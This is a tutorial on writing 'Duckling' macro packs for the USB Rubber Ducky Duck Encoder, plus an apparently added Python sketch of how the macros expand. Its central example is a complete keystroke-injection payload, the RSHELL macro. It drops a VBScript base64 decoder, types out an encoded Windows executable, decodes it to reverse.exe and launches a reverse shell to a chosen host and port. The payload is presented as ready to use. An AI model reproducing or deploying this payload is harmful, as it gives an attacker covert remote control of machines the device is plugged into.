
[Tutorial] Ducklings 101



What is a Duckling?

New to Duck Encoder v3.0.0, Ducklings are JAR files full of stored procedures or macros which can make writing DuckyScripts a lot easier and more streamlined. They are housed within the "ducklings" sub-directory, wherever your encoder is installed.

Ducklings use a similar syntax to regular DuckyScript, but introduce a new prefixed namespace for each Duckling:

NAMESPACE::COMMAND arguments


The namespace for each duckling is described within its documentation, which is displayed by executing the .duckling.jar file. This also lists all the syntax available within the duckling, as well as details such as the author and version.

java -jar SamplePack.duckling.jar


Ducklings are currently in open beta until we gain enough feedback to confirm they are stable. Please help us with this task and send us your feedback.

So, how do they work?

Ducklings work by resolving a single-line entry into a multi-line script snippet, inline at the point where it belongs in the script. Multiple ducklings can be used within the same script, and duckling macros can even be nested inside each other, so long as all dependency files are available when the script is encoded.

The main limitation is that the REPEAT command will merely repeat the last line of the stored procedure, not the macro itself. This will hopefully be resolved in a later version, once the Ducklings are known to be fully stable.

Within the SamplePack.duckling.jar included within the v3.0.0 release of the encoder, there is a single macro called "HELLOWORLD", and the namespace for the Duckling is "SAMPLE". To use this within a script, we use the new namespacing syntax:

SAMPLE::HELLOWORLD It Works! :D


This is then translated, inline, into the following script when it is encoded:

STRING Hello World!
STRING You Wrote: It Works! :D


Obviously, this is only a very basic example, but pretty much any payload can be stored within a duckling and executed using a single line.

Example:

REM Runs a Remote Shell to 192.168.1.7 on port 2600.
WINNET::RSHELL host 192.168.1.7 sap 2600

How do I create my own Duckling?

The source code for the ducklings is available here:

Zip: http://ducky-decode.googlecode.com/files/SamplePack.duckling.zip (7ac17bc509334fb92b8f5b8e193a9b822b7b31ca)
Svn: http://code.google.com/p/ducky-decode/source/browse/#svn/trunk/Ducklings/v1/SamplePack.duckling

A basic knowledge of Java (or at least C-style syntax) is needed until a generator is developed. The source code is relatively self-explanatory, I created the ducklings from scratch after only four days of ever coding in Java, so it's not overly complicated at all.

The only files we're interested in are Duckling.java and Main.java.

Duckling.java:

First, we need to set the namespace for the duckling:

/**
* TODO: Set the namespace for the duckling.
*/
private String mNamespace = "WINNET";
 


Then, declare a new macro and add it to the macro list.

    /**
     * TODO: Declare and initialise your macros.
     */
    private void InitialiseMacros() {

        /**
         * TODO: Declare each macro in turn and add it to the dictionary.
         */
        Macro RemoteShell = new Macro("RSHELL", "host-ip port-number");
        RemoteShell.setDescription("Opens a remote shell to a given ip address on a specific port.");
        // The script is built up line by line; each %s is filled from the call arguments, in order.
        RemoteShell.setScript("DELAY 600\n"
                            + "ESCAPE\n"
                            + "ESCAPE\n"
                            + "DELAY 400\n"
                            + "WINDOWS R\n"
                            + "DELAY 400\n"
                            + "STRING cmd\n"
                            + "DELAY 400\n"
                            + "ENTER\n"
                            + "DELAY 400\n"
                            + "STRING copy con c:\\decoder.vbs\n"
                            + "ENTER\n"
                            + "STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)\n"
                            + "STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = \n"
                            + "STRING CreateObject(\"Scripting.FileSystemObject\"):\n"
                            + "ENTER\n"
                            + "STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = \n"
                            + "STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function \n"
                            + "STRING decodeBase64(base64):\n"
                            + "ENTER\n"
                            + "STRING dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):\n"
                            + "STRING EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub \n"
                            + "STRING writeBytes(file, bytes):Dim binaryStream:\n"
                            + "ENTER\n"
                            + "STRING Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:\n"
                            + "STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub\n"
                            + "ENTER\n"
                            + "CTRL z\n"
                            + "ENTER\n"
                            + "STRING copy con c:\\reverse.txt\n"
                            + "ENTER\n"
                            + "STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS\n"
                            + "ENTER\n"
                            + "STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA\n"
                            + "ENTER\n"
                            + "STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2\n"
                            + "ENTER\n"
                            + "STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A\n"
                            + "ENTER\n"
                            + "STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA\n"
                            + "ENTER\n"
                            + "STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA\n"
                            + "ENTER\n"
                            + "STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq\n"
                            + "ENTER\n"
                            + "STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF\n"
                            + "ENTER\n"
                            + "STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv\n"
                            + "ENTER\n"
                            + "STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp\n"
                            + "ENTER\n"
                            + "STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm\n"
                            + "ENTER\n"
                            + "STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A\n"
                            + "ENTER\n"
                            + "STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s\n"
                            + "ENTER\n"
                            + "STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9\n"
                            + "ENTER\n"
                            + "STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp\n"
                            + "ENTER\n"
                            + "STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY\n"
                            + "ENTER\n"
                            + "STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B\n"
                            + "ENTER\n"
                            + "STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk\n"
                            + "ENTER\n"
                            + "STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA\n"
                            + "ENTER\n"
                            + "STRING AAxAAADpdL7//wAAAAIAAAAMQAAA\n"
                            + "ENTER\n"
                            + "CTRL z\n"
                            + "ENTER\n"
                            + "STRING cscript c:\\decoder.vbs c:\\reverse.txt c:\\reverse.exe\n"
                            + "ENTER\n"
                            + "STRING c:\\reverse.exe %s %s\n"
                            + "ENTER\n"
                            + "STRING exit\n"
                            + "ENTER\n");
        this.MacroList.put("RSHELL", RemoteShell);
    }

The arguments ([host-ip] and [port-number]) are substituted using the standard Java %s string substitution method, so the arguments on the calling line must be given in the same order as the %s placeholders appear within the script. Within the initialiser, the argument names are only used for the documentation, but their order is vitally important.
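The NAMESPACE::COMMAND resolution described under "So, how do they work?" and the %s placeholder ordering described above, written out as an added example in Python rather than the encoder's Java. This is not code from the encoder or from the SamplePack; the Macro/Duckling classes, the expand() and bind_args() helpers, the DEMO duckling and its GREET macro are all constructed here for illustration. It goes slightly beyond the post in two ways: it rejects a call whose argument count does not match the number of %s placeholders (the post only says the order matters), and it caps nesting depth so a macro that expands to itself cannot loop. The REPEAT handling reproduces the limitation the post describes: after a macro call, REPEAT repeats the macro's last expanded line, not the macro.

```python
"""Stand-alone illustration of Duckling macro expansion (not the encoder's code)."""
import re
from dataclasses import dataclass, field

MAX_DEPTH = 8  # assumption: stops a macro that (directly or indirectly) expands to itself


@dataclass
class Macro:
    name: str        # the COMMAND half of NAMESPACE::COMMAND
    arg_names: list  # documented argument names, in placeholder order
    script: str      # DuckyScript template; each %s is filled from the call, in order


@dataclass
class Duckling:
    namespace: str
    macros: dict = field(default_factory=dict)

    def add(self, macro):
        self.macros[macro.name] = macro
        return self


# A macro call is NAMESPACE::COMMAND followed by an optional argument string.
CALL = re.compile(r"^(?P<ns>\w+)::(?P<cmd>\w+)(?:\s+(?P<args>.*))?$")


def bind_args(macro, arg_text):
    """Split the argument text into one field per %s placeholder.

    The last placeholder takes the rest of the line, so a one-argument macro
    such as HELLOWORLD keeps the spaces in its text. A count mismatch is an
    error rather than a silently half-filled script (a check added here).
    """
    n = macro.script.count("%s")
    fields = arg_text.split(None, n - 1) if n and arg_text.strip() else []
    if len(fields) != n:
        raise ValueError(f"{macro.name} expects {n} argument(s) "
                         f"[{' '.join(macro.arg_names)}], got {len(fields)}")
    return fields


def fill(template, values):
    """Replace each %s in order. Only the %s tokens are touched, so a literal %
    elsewhere in the stored script passes through unchanged."""
    parts = template.split("%s")
    if len(parts) != len(values) + 1:
        raise ValueError("placeholder/argument count mismatch")
    return "".join(p + v for p, v in zip(parts, values)) + parts[-1]


def expand(script, ducklings, depth=0):
    """Resolve every macro call line into its stored procedure, inline.

    Nested macro calls inside a stored procedure are expanded recursively.
    REPEAT n repeats only the previously emitted line, which is exactly the
    limitation the post describes: after a macro it repeats that macro's
    last line, not the whole macro.
    """
    if depth > MAX_DEPTH:
        raise RecursionError("macro nesting too deep (self-referencing macro?)")
    out = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        call = CALL.match(line)
        if call:
            ns, cmd = call.group("ns"), call.group("cmd")
            if ns not in ducklings or cmd not in ducklings[ns].macros:
                raise KeyError(f"unknown macro {ns}::{cmd}")
            macro = ducklings[ns].macros[cmd]
            body = fill(macro.script, bind_args(macro, call.group("args") or ""))
            out.extend(expand(body, ducklings, depth + 1))
        elif line.upper().startswith("REPEAT "):
            if not out:
                raise ValueError("REPEAT with nothing to repeat")
            out.extend([out[-1]] * int(line.split()[1]))
        else:
            out.append(line)
    return out


# The SAMPLE duckling as the post describes it.
SAMPLE = Duckling("SAMPLE").add(Macro(
    "HELLOWORLD", ["text"],
    "STRING Hello World!\nSTRING You Wrote: %s\n"))

# Constructed for this example: a two-argument macro that nests a SAMPLE call.
# arg_names follow the %s order in the script; that order is what the caller must match.
DEMO = Duckling("DEMO").add(Macro(
    "GREET", ["delay-ms", "name"],
    "DELAY %s\nSAMPLE::HELLOWORLD hi %s\n"))

DUCKLINGS = {d.namespace: d for d in (SAMPLE, DEMO)}


def demo():
    """Constructed input script exercising a plain call, a nested call and REPEAT."""
    script = "SAMPLE::HELLOWORLD It Works! :D\nDEMO::GREET 500 Bob\nREPEAT 2\n"
    return expand(script, DUCKLINGS)


if __name__ == "__main__":
    print("\n".join(demo()))
```

Running it prints the seven expanded lines; the final three are all "STRING You Wrote: hi Bob", because REPEAT 2 repeats only the last line that DEMO::GREET produced. If the encoder substitutes via Java's String.format, a literal % in a stored script would need escaping as %%, whereas fill() above replaces only the %s tokens; check the encoder's behaviour before relying on either.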

As the ducklings develop, more features will be added, but due to their structure and the development process they will go through, I'm afraid we cannot guarantee any backwards compatibility between subversions of the duckling source.

Main.java:

Here, all we need to change is the identifying information about the duckling.

    private static String Title = "Windows Network and Internet Tools";
    private static String Version = "1.0.0.a";
    private static String Author = "Apache - ApacheTech Consultancy";

Then just export the project as a runnable JAR file (the procedure differs on various IDEs) and you're done.

Again, please let us know your feedback and any suggestions you may have for development.

Developer Info:

Duckling Development Stage: Open Beta
Duckling Factory Development Stage: Pre-Alpha
